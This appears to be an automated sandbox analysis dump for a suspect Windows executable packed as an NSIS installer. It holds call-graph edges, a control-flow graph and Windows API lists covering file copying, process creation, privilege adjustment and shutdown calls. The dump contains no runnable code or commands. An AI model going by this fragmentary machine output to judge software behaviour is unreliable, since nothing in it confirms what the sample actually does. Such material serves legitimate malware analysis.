4063e8 lstrcpynW 4623->4752 4751 4063e8 lstrcpynW 4624->4751 4627 40640a 17 API calls 4628 4038e8 DeleteFileW 4627->4628 4629 4038f5 CopyFileW 4628->4629 4634 4038b7 4628->4634 4629->4634 4630 40393e 4632 4061ae 36 API calls 4630->4632 4631 4061ae 36 API calls 4631->4634 4632->4577 4633 40640a 17 API calls 4633->4634 4634->4627 4634->4630 4634->4631 4634->4633 4636 403929 CloseHandle 4634->4636 4753 4059d1 CreateProcessW 4634->4753 4636->4634 4637->4562 4638->4564 4640 40667c 5 API calls 4639->4640 4642 403480 4640->4642 4641 40348a 4641->4570 4642->4641 4643 405cbd 3 API calls 4642->4643 4644 403492 4643->4644 4645 40599c 2 API calls 4644->4645 4646 403498 4645->4646 4756 405f0d 4646->4756 4760 405ede GetFileAttributesW CreateFileW 4649->4760 4651 402f73 4678 402f80 4651->4678 4761 4063e8 lstrcpynW 4651->4761 4653 402f96 4654 405d09 2 API calls 4653->4654 4655 402f9c 4654->4655 4762 4063e8 lstrcpynW 4655->4762 4657 402fa7 GetFileSize 4658 4030a8 4657->4658 4659 402fbe 4657->4659 4660 402e8e 32 API calls 4658->4660 4659->4658 4662 403447 ReadFile 4659->4662 4664 403143 4659->4664 4670 402e8e 32 API calls 4659->4670 4659->4678 4661 4030af 4660->4661 4663 4030eb GlobalAlloc 4661->4663 4661->4678 4764 40345d SetFilePointer 4661->4764 4662->4659 4666 403102 4663->4666 4667 402e8e 32 API calls 4664->4667 4671 405f0d 2 API calls 4666->4671 4667->4678 4668 4030cc 4669 403447 ReadFile 4668->4669 4672 4030d7 4669->4672 4670->4659 4673 403113 CreateFileW 4671->4673 4672->4663 4672->4678 4674 40314d 4673->4674 4673->4678 4763 40345d SetFilePointer 4674->4763 4676 40315b 4677 4031d6 44 API calls 4676->4677 4677->4678 4678->4578 4678->4678 4680 4067c2 5 API calls 4679->4680 4681 403aec 4680->4681 4682 403b04 4681->4682 4684 403af2 4681->4684 4683 4062b6 3 API calls 4682->4683 4685 403b34 4683->4685 4773 40632f wsprintfW 4684->4773 4687 403b53 lstrcatW 4685->4687 4689 4062b6 3 API calls 4685->4689 4688 403b02 4687->4688 4765 403dae 4688->4765 4689->4687 4692 405dc5 18 API calls 4693 403b85 4692->4693 4694 403c19 4693->4694 4696 4062b6 3 API calls 4693->4696 4695 405dc5 18 API calls 4694->4695 4697 403c1f 4695->4697 4698 403bb7 4696->4698 4699 403c2f LoadImageW 4697->4699 4700 40640a 17 API calls 4697->4700 4698->4694 4703 403bd8 lstrlenW 4698->4703 4707 405cea CharNextW 4698->4707 4701 403cd5 4699->4701 4702 403c56 RegisterClassW 4699->4702 4700->4699 4706 40140b 2 API calls 4701->4706 4704 403cdf 4702->4704 4705 403c8c SystemParametersInfoW CreateWindowExW 4702->4705 4708 403be6 lstrcmpiW 4703->4708 4709 403c0c 4703->4709 4704->4577 4705->4701 4710 403cdb 4706->4710 4711 403bd5 4707->4711 4708->4709 4712 403bf6 GetFileAttributesW 4708->4712 4713 405cbd 3 API calls 4709->4713 4710->4704 4715 403dae 18 API calls 4710->4715 4711->4703 4714 403c02 4712->4714 4716 403c12 4713->4716 4714->4709 4717 405d09 2 API calls 4714->4717 4718 403cec 4715->4718 4774 4063e8 lstrcpynW 4716->4774 4717->4709 4720 403cf8 ShowWindow 4718->4720 4721 403d7b 4718->4721 4722 406752 3 API calls 4720->4722 4775 405523 OleInitialize 4721->4775 4724 403d10 4722->4724 4726 403d1e GetClassInfoW 4724->4726 4729 406752 3 API calls 4724->4729 4725 403d81 4727 403d85 4725->4727 4728 403d9d 4725->4728 4731 403d32 GetClassInfoW RegisterClassW 4726->4731 4732 403d48 DialogBoxParamW 4726->4732 4727->4704 4733 40140b 2 API calls 4727->4733 4730 40140b 2 API calls 4728->4730 4729->4726 4730->4704 4731->4732 4734 40140b 2 API calls 4732->4734 4733->4704 4734->4704 4735->4580 4736->4614 4737->4581 4739 403a01 4738->4739 4740 4039f7 CloseHandle 4738->4740 4741 403a15 4739->4741 4742 403a0b CloseHandle 4739->4742 4740->4739 4786 403a43 4741->4786 4742->4741 4745 405afa 67 API calls 4746 403819 OleUninitialize 4745->4746 4746->4590 4746->4591 4749 405a63 4747->4749 4748 403838 ExitProcess 4749->4748 4750 405a77 MessageBoxIndirectW 4749->4750 4750->4748 4751->4623 4752->4634 4754 405a10 4753->4754 4755 405a04 CloseHandle 4753->4755 4754->4634 4755->4754 4757 405f1a GetTickCount GetTempFileNameW 4756->4757 4758 405f50 4757->4758 4759 4034a3 4757->4759 4758->4757 4758->4759 4759->4570 4760->4651 4761->4653 4762->4657 4763->4676 4764->4668 4766 403dc2 4765->4766 4782 40632f wsprintfW 4766->4782 4768 403e33 4783 403e67 4768->4783 4770 403b63 4770->4692 4771 403e38 4771->4770 4772 40640a 17 API calls 4771->4772 4772->4771 4773->4688 4774->4694 4776 4043ab SendMessageW 4775->4776 4777 405546 4776->4777 4780 401389 2 API calls 4777->4780 4781 40556d 4777->4781 4778 4043ab SendMessageW 4779 40557f OleUninitialize 4778->4779 4779->4725 4780->4777 4781->4778 4782->4768 4784 40640a 17 API calls 4783->4784 4785 403e75 SetWindowTextW 4784->4785 4785->4771 4787 403a51 4786->4787 4788 403a1a 4787->4788 4789 403a56 FreeLibrary GlobalFree 4787->4789 4788->4745 4789->4788 4789->4789 5904 404ba6 5905 404bd2 5904->5905 5906 404bb6 5904->5906 5908 404c05 5905->5908 5909 404bd8 SHGetPathFromIDListW 5905->5909 5915 405a32 GetDlgItemTextW 5906->5915 5911 404bef SendMessageW 5909->5911 5912 404be8 5909->5912 5910 404bc3 SendMessageW 5910->5905 5911->5908 5913 40140b 2 API calls 5912->5913 5913->5911 5915->5910 5930 4029a8 5931 402c1f 17 API calls 5930->5931 5932 4029ae 5931->5932 5933 4029d5 5932->5933 5934 4029ee 5932->5934 5935 40288b 5932->5935 5936 4029da 5933->5936 5943 4029eb 5933->5943 5937 402a08 5934->5937 5938 4029f8 5934->5938 5944 4063e8 lstrcpynW 5936->5944 5940 40640a 17 API calls 5937->5940 5939 402c1f 17 API calls 5938->5939 5939->5943 5940->5943 5943->5935 5945 40632f wsprintfW 5943->5945 5944->5935 5945->5935 5946 7556103d 5947 7556101b 5 API calls 5946->5947 5948 75561056 5947->5948 5949 4028ad 5950 402c41 17 API calls 5949->5950 5951 4028bb 5950->5951 5952 4028d1 5951->5952 5953 402c41 17 API calls 5951->5953 5954 405eb9 2 API calls 5952->5954 5953->5952 5955 4028d7 5954->5955 5977 405ede GetFileAttributesW CreateFileW 5955->5977 5957 4028e4 5958 4028f0 GlobalAlloc 5957->5958 5959 402987 5957->5959 5962 402909 5958->5962 5963 40297e CloseHandle 5958->5963 5960 4029a2 5959->5960 5961 40298f DeleteFileW 5959->5961 5961->5960 5978 40345d SetFilePointer 5962->5978 5963->5959 5965 40290f 5966 403447 ReadFile 5965->5966 5967 402918 GlobalAlloc 5966->5967 5968 402928 5967->5968 5969 40295c 5967->5969 5970 4031d6 44 API calls 5968->5970 5971 405f90 WriteFile 5969->5971 5976 402935 5970->5976 5972 402968 GlobalFree 5971->5972 5973 4031d6 44 API calls 5972->5973 5975 40297b 5973->5975 5974 402953 GlobalFree 5974->5969 5975->5963 5976->5974 5977->5957 5978->5965 5986 401a30 5987 402c41 17 API calls 5986->5987 5988 401a39 ExpandEnvironmentStringsW 5987->5988 5989 401a4d 5988->5989 5991 401a60 5988->5991 5990 401a52 lstrcmpW 5989->5990 5989->5991 5990->5991 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5070 401423 24 API calls 5068->5070 5071 40204b 5069->5071 5076 402250 5070->5076 5072 402c41 17 API calls 5071->5072 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5077 40207b 5074->5077 5075->5074 5075->5077 5089 406831 WideCharToMultiByte 5077->5089 5080 4020c5 5082 405450 24 API calls 5080->5082 5081 40208c 5083 402094 5081->5083 5084 4020ab 5081->5084 5085 40209c 5082->5085 5086 401423 24 API calls 5083->5086 5092 75561777 5084->5092 5085->5076 5087 4020e8 FreeLibrary 5085->5087 5086->5085 5087->5076 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 755617aa 5092->5093 5134 75561b5f 5093->5134 5095 755617b1 5096 755618d6 5095->5096 5097 755617c2 5095->5097 5098 755617c9 5095->5098 5096->5085 5184 75562352 5097->5184 5168 75562394 5098->5168 5103 7556180f 5197 75562569 5103->5197 5104 7556182d 5109 75561833 5104->5109 5110 7556187e 5104->5110 5105 755617df 5108 755617e5 5105->5108 5113 755617f0 5105->5113 5106 755617f8 5119 755617ee 5106->5119 5194 75562d37 5106->5194 5108->5119 5178 75562aac 5108->5178 5216 755615c6 5109->5216 5111 75562569 10 API calls 5110->5111 5117 7556186f 5111->5117 5112 75561815 5208 755615b4 5112->5208 5188 75562724 5113->5188 5125 755618c5 5117->5125 5222 7556252c 5117->5222 5119->5103 5119->5104 5123 755617f6 5123->5119 5124 75562569 10 API calls 5124->5117 5125->5096 5129 755618cf GlobalFree 5125->5129 5129->5096 5131 755618b1 5131->5125 5226 7556153d wsprintfW 5131->5226 5132 755618aa FreeLibrary 5132->5131 5229 7556121b GlobalAlloc 5134->5229 5136 75561b83 5230 7556121b GlobalAlloc 5136->5230 5138 75561da9 GlobalFree GlobalFree GlobalFree 5139 75561dc6 5138->5139 5155 75561e10 5138->5155 5140 75562192 5139->5140 5148 75561ddb 5139->5148 5139->5155 5142 755621b4 GetModuleHandleW 5140->5142 5140->5155 5141 75561c64 GlobalAlloc 5163 75561b8e 5141->5163 5144 755621c5 LoadLibraryW 5142->5144 5145 755621da 5142->5145 5143 75561ccd GlobalFree 5143->5163 5144->5145 5144->5155 5237 7556161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5145->5237 5146 75561caf lstrcpyW 5147 75561cb9 lstrcpyW 5146->5147 5147->5163 5148->5155 5233 7556122c 5148->5233 5150 7556222c 5153 75562239 lstrlenW 5150->5153 5150->5155 5151 755620ec 5151->5155 5161 75562134 lstrcpyW 5151->5161 5238 7556161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5153->5238 5154 75562064 5236 7556121b GlobalAlloc 5154->5236 5155->5095 5156 755621ec 5156->5150 5166 75562216 GetProcAddress 5156->5166 5159 75561d0b 5159->5163 5231 7556158f GlobalSize GlobalAlloc 5159->5231 5160 75561fa5 GlobalFree 5160->5163 5161->5155 5162 75562253 5162->5155 5163->5138 5163->5141 5163->5143 5163->5146 5163->5147 5163->5151 5163->5154 5163->5155 5163->5159 5163->5160 5165 7556122c 2 API calls 5163->5165 5165->5163 5166->5150 5167 7556206d 5167->5095 5170 755623ac 5168->5170 5169 7556122c GlobalAlloc lstrcpynW 5169->5170 5170->5169 5172 755624d5 GlobalFree 5170->5172 5173 75562454 GlobalAlloc WideCharToMultiByte 5170->5173 5174 7556247f GlobalAlloc CLSIDFromString 5170->5174 5176 7556249e 5170->5176 5240 755612ba 5170->5240 5172->5170 5175 755617cf 5172->5175 5173->5172 5174->5172 5175->5105 5175->5106 5175->5119 5176->5172 5244 755626b8 5176->5244 5179 75562abe 5178->5179 5180 75562b63 CreateFileA 5179->5180 5183 75562b81 5180->5183 5182 75562c4d 5182->5119 5247 75562a56 5183->5247 5185 75562367 5184->5185 5186 75562372 GlobalAlloc 5185->5186 5187 755617c8 5185->5187 5186->5185 5187->5098 5192 75562754 5188->5192 5189 75562802 5191 75562808 GlobalSize 5189->5191 5193 75562812 5189->5193 5190 755627ef GlobalAlloc 5190->5193 5191->5193 5192->5189 5192->5190 5193->5123 5195 75562d42 5194->5195 5196 75562d82 GlobalFree 5195->5196 5251 7556121b GlobalAlloc 5197->5251 5199 7556260e StringFromGUID2 5204 75562573 5199->5204 5200 7556261f lstrcpynW 5200->5204 5201 755625ec MultiByteToWideChar 5201->5204 5202 75562656 GlobalFree 5202->5204 5203 75562632 wsprintfW 5203->5204 5204->5199 5204->5200 5204->5201 5204->5202 5204->5203 5205 7556268b GlobalFree 5204->5205 5206 75561272 2 API calls 5204->5206 5252 755612e1 5204->5252 5205->5112 5206->5204 5256 7556121b GlobalAlloc 5208->5256 5210 755615b9 5211 755615c6 2 API calls 5210->5211 5212 755615c3 5211->5212 5213 75561272 5212->5213 5214 755612b5 GlobalFree 5213->5214 5215 7556127b GlobalAlloc lstrcpynW 5213->5215 5214->5117 5215->5214 5217 755615ff lstrcpyW 5216->5217 5218 755615d2 wsprintfW 5216->5218 5221 75561618 5217->5221 5218->5221 5221->5124 5223 7556253a 5222->5223 5224 75561891 5222->5224 5223->5224 5225 75562556 GlobalFree 5223->5225 5224->5131 5224->5132 5225->5223 5227 75561272 2 API calls 5226->5227 5228 7556155e 5227->5228 5228->5125 5229->5136 5230->5163 5232 755615ad 5231->5232 5232->5159 5239 7556121b GlobalAlloc 5233->5239 5235 7556123b lstrcpynW 5235->5155 5236->5167 5237->5156 5238->5162 5239->5235 5241 755612c1 5240->5241 5242 7556122c 2 API calls 5241->5242 5243 755612df 5242->5243 5243->5170 5245 755626c6 VirtualAlloc 5244->5245 5246 7556271c 5244->5246 5245->5246 5246->5176 5248 75562a61 5247->5248 5249 75562a66 GetLastError 5248->5249 5250 75562a71 5248->5250 5249->5250 5250->5182 5251->5204 5253 7556130c 5252->5253 5254 755612ea 5252->5254 5253->5204 5254->5253 5255 755612f0 lstrcpyW 5254->5255 5255->5253 5256->5210 5997 402a35 5998 402c1f 17 API calls 5997->5998 5999 402a3b 5998->5999 6000 402a72 5999->6000 6001 40288b 5999->6001 6003 402a4d 5999->6003 6000->6001 6002 40640a 17 API calls 6000->6002 6002->6001 6003->6001 6005 40632f wsprintfW 6003->6005 6005->6001 6006 401735 6007 402c41 17 API calls 6006->6007 6008 40173c SearchPathW 6007->6008 6009 401757 6008->6009 6011 4029e6 6008->6011 6009->6011 6012 4063e8 lstrcpynW 6009->6012 6012->6011 6013 4014b8 6014 4014be 6013->6014 6015 401389 2 API calls 6014->6015 6016 4014c6 6015->6016 6017 401db9 GetDC 6018 402c1f 17 API calls 6017->6018 6019 401dcb GetDeviceCaps MulDiv ReleaseDC 6018->6019 6020 402c1f 17 API calls 6019->6020 6021 401dfc 6020->6021 6022 40640a 17 API calls 6021->6022 6023 401e39 CreateFontIndirectW 6022->6023 6024 402592 6023->6024 6025 40283b 6026 402843 6025->6026 6027 402847 FindNextFileW 6026->6027 6029 402859 6026->6029 6027->6029 6028 4029e6 6029->6028 6031 4063e8 lstrcpynW 6029->6031 6031->6028

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 31 4035d5-4035d9 28->31 32 4035ce-4035d3 28->32 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 31->33 34 4035db-4035df 31->34 32->31 32->32 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 52 4036b2-4036b3 36->52 53 4036b4-4036ba 36->53 41 4035f2-4035fa 37->41 42 40360b-403644 37->42 38->39 58 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->58 54 403814-403824 call 4039e6 OleUninitialize 39->54 55 403769-40376f 39->55 47 403601 41->47 48 4035fc-4035ff 41->48 49 403661-40369b 42->49 50 403646-40364b 42->50 47->42 48->42 48->47 49->36 57 40369d-4036a1 49->57 50->49 56 40364d-403655 50->56 52->53 53->28 59 4036c0 53->59 75 40394a-403950 54->75 76 40382a-40383a call 405a4e ExitProcess 54->76 60 403804-40380b call 403ad8 55->60 61 403775-403780 call 405cea 55->61 63 403657-40365a 56->63 64 40365c 56->64 57->36 65 4036c2-4036d0 call 4063e8 57->65 58->39 58->54 67 4036d5 59->67 74 403810 60->74 79 403782-4037b7 61->79 80 4037ce-4037d8 61->80 63->49 63->64 64->49 65->67 67->29 74->54 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 82 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->82 83 40399e-4039ac call 4067c2 77->83 85 4039d8 78->85 86 4039dc-4039e0 ExitProcess 78->86 84 4037b9-4037bd 79->84 87 403840-403854 call 4059b9 lstrcatW 80->87 88 4037da-4037e8 call 405dc5 80->88 82->83 102 4039ba-4039c5 ExitWindowsEx 83->102 103 4039ae-4039b8 83->103 91 4037c6-4037ca 84->91 92 4037bf-4037c4 84->92 85->86 100 403861-40387b lstrcatW lstrcmpiW 87->100 101 403856-40385c lstrcatW 87->101 88->54 99 4037ea-403800 call 4063e8 * 2 88->99 91->84 97 4037cc 91->97 92->91 92->97 97->80 99->60 100->54 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->54 138->126
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00000020,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\V7OHj6ISEo.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: "C:\Users\user\Desktop\V7OHj6ISEo.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\Iw$C:\Users\user\AppData\Local\Iw$C:\Users\user\Desktop$C:\Users\user\Desktop\V7OHj6ISEo.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-2866153094
                                                                                                            • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 158 4051c7-4051cf 152->158 159 405158-40515e 152->159 153->154 154->151 161 405089-40508c 155->161 162 4050fc-4050ff 155->162 156->152 156->155 193 404f33-404f39 157->193 194 404ff8-40500b GetWindowLongW SetWindowLongW 157->194 167 4051d1-4051d7 SendMessageW 158->167 168 4051d9-4051e0 158->168 164 405164-40516e 159->164 165 4053af-4053c1 call 4043c6 159->165 170 405097-4050ac call 404d1a 161->170 171 40508e-405095 161->171 162->152 166 405101-40510b 162->166 164->165 174 405174-405183 SendMessageW 164->174 176 40511b-405125 166->176 177 40510d-405119 SendMessageW 166->177 167->168 178 4051e2-4051e9 168->178 179 405214-40521b 168->179 170->162 192 4050ae-4050bf 170->192 171->162 171->170 174->165 184 405189-40519a SendMessageW 174->184 176->152 186 405127-405131 176->186 177->176 187 4051f2-4051f9 178->187 188 4051eb-4051ec ImageList_Destroy 178->188 182 405371-405378 179->182 183 405221-40522d call 4011ef 179->183 182->165 198 40537a-405381 182->198 211 40523d-405240 183->211 212 40522f-405232 183->212 196 4051a4-4051a6 184->196 197 40519c-4051a2 184->197 199 405142-40514c 186->199 200 405133-405140 186->200 190 405202-40520e 187->190 191 4051fb-4051fc GlobalFree 187->191 188->187 190->179 191->190 192->162 201 4050c1-4050c3 192->201 202 404f3c-404f43 193->202 206 405011-405015 194->206 204 4051a7-4051c0 call 401299 SendMessageW 196->204 197->196 197->204 198->165 205 405383-4053ad ShowWindow GetDlgItem ShowWindow 198->205 199->152 200->152 207 4050c5-4050cc 201->207 208 4050d6 201->208 209 404fd9-404fec 202->209 210 404f49-404f71 202->210 204->158 205->165 214 405017-40502a ShowWindow call 404394 206->214 215 40502f-405037 call 404394 206->215 217 4050d2-4050d4 207->217 218 4050ce-4050d0 207->218 221 4050d9-4050f5 call 40117d 208->221 209->202 225 404ff2-404ff6 209->225 219 404f73-404fa9 SendMessageW 210->219 220 404fab-404fad 210->220 226 405281-4052a5 call 4011ef 211->226 227 405242-40525b call 4012e2 call 401299 211->227 222 405234 212->222 223 405235-405238 call 404d9a 212->223 214->165 215->140 217->221 218->221 219->209 229 404fc0-404fd6 SendMessageW 220->229 230 404faf-404fbe SendMessageW 220->230 221->162 222->223 223->211 225->194 225->206 241 405347-40535b InvalidateRect 226->241 242 4052ab 226->242 247 40526b-40527a SendMessageW 227->247 248 40525d-405263 227->248 229->209 230->209 241->182 243 40535d-40536c call 404ced call 404cd5 241->243 244 4052ae-4052b9 242->244 243->182 249 4052bb-4052ca 244->249 250 40532f-405341 244->250 247->226 251 405265 248->251 252 405266-405269 248->252 254 4052cc-4052d9 249->254 255 4052dd-4052e0 249->255 250->241 250->244 251->252 252->247 252->248 254->255 257 4052e2-4052e5 255->257 258 4052e7-4052f0 255->258 259 4052f5-40532d SendMessageW * 2 257->259 258->259 260 4052f2 258->260 259->250 260->259
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
